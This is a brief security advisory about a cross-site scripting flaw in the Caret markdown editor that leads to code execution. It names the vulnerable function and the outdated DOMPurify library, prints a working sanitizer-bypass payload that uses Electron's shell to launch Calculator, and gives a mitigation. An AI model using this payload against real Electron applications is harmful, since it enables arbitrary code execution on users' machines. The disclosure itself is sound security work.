XSS in Caret markdown editor leads to remote code execution when viewing crafted Markdown files
All versions are affected
This issue is caused due to insufficient validation of the document data, which is sent to the
Electron renderer.
Specifically, in the getMarkdownHtmlElement
function in the file
app.asar/extensions/Markdown/Markdown.js
-
t.firstChild.innerHTML = DOMPurify.sanitize(r)
An older version of DOMPurify is used, which has known filtering bypasses (see below)
Opening a document with the following contents, when preview mode is enabled, leads to the immediate execution of an arbitrary process (in this case - Calculator) -
<form><math><mtext></form><form><mglyph><style></math><img src
onerror="try{ const {shell} = require('electron');
shell.openExternal('file:C:/Windows/System32/calc.exe') }catch(e){alert(e)}">
Disable Caret's "Preview Mode"